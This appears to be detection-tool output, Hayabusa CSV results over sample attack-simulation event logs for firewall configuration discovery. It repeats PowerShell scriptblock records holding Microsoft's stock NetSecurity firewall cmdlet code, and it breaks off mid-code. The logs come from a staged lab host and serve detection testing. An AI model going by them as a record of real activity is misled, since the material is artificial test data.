""Get-NetIPsecQuickModeSA"", ""Get-NetIPsecRule"", ""New-NetFirewallRule"", ""New-NetIPsecDospSetting"", ""New-NetIPsecMainModeCryptoSet"", ""New-NetIPsecMainModeRule"", ""New-NetIPsecPhase1AuthSet"", ""New-NetIPsecPhase2AuthSet"", ""New-NetIPsecQuickModeCryptoSet"", ""New-NetIPsecRule"", ""Open-NetGPO"", ""Remove-NetFirewallRule"", ""Remove-NetIPsecDospSetting"", ""Remove-NetIPsecMainModeCryptoSet"", ""Remove-NetIPsecMainModeRule"", ""Remove-NetIPsecMainModeSA"", ""Remove-NetIPsecPhase1AuthSet"", ""Remove-NetIPsecPhase2AuthSet"", ""Remove-NetIPsecQuickModeCryptoSet"", ""Remove-NetIPsecQuickModeSA"", ""Remove-NetIPsecRule"", ""Rename-NetFirewallRule"", ""Rename-NetIPsecMainModeCryptoSet"", ""Rename-NetIPsecMainModeRule"", ""Rename-NetIPsecPhase1AuthSet"", ""Rename-NetIPsecPhase2AuthSet"", ""Rename-NetIPsecQuickModeCryptoSet"", ""Rename-NetIPsecRule"", ""Save-NetGPO"", ""Find-NetIPsecRule"", ""Set-NetFirewallAddressFilter"", 
""Set-NetFirewallApplicationFilter"", ""Set-NetFirewallInterfaceFilter"", ""Set-NetFirewallInterfaceTypeFilter"", ""Set-NetFirewallPortFilter"", ""Set-NetFirewallProfile"", ""Set-NetFirewallRule"", ""Set-NetFirewallSecurityFilter"", ""Set-NetFirewallServiceFilter"", ""Set-NetFirewallSetting"", ""Set-NetIPsecDospSetting"", ""Set-NetIPsecMainModeCryptoSet"", ""Set-NetIPsecMainModeRule"", ""Set-NetIPsecPhase1AuthSet"", ""Set-NetIPsecPhase2AuthSet"", ""Set-NetIPsecQuickModeCryptoSet"", ""Set-NetIPsecRule"", ""Show-NetFirewallRule"", ""Show-NetIPsecRule"", ""Sync-NetIPsecRule"", ""Update-NetIPsecRule"" ) CmdletsToExport = @( ""Get-DAPolicyChange"", ""New-NetIPsecAuthProposal"", ""New-NetIPsecMainModeCryptoProposal"", ""New-NetIPsecQuickModeCryptoProposal"" ) AliasesToExport = @( ) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallRule ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 
",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, 
[Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'I",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,n'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
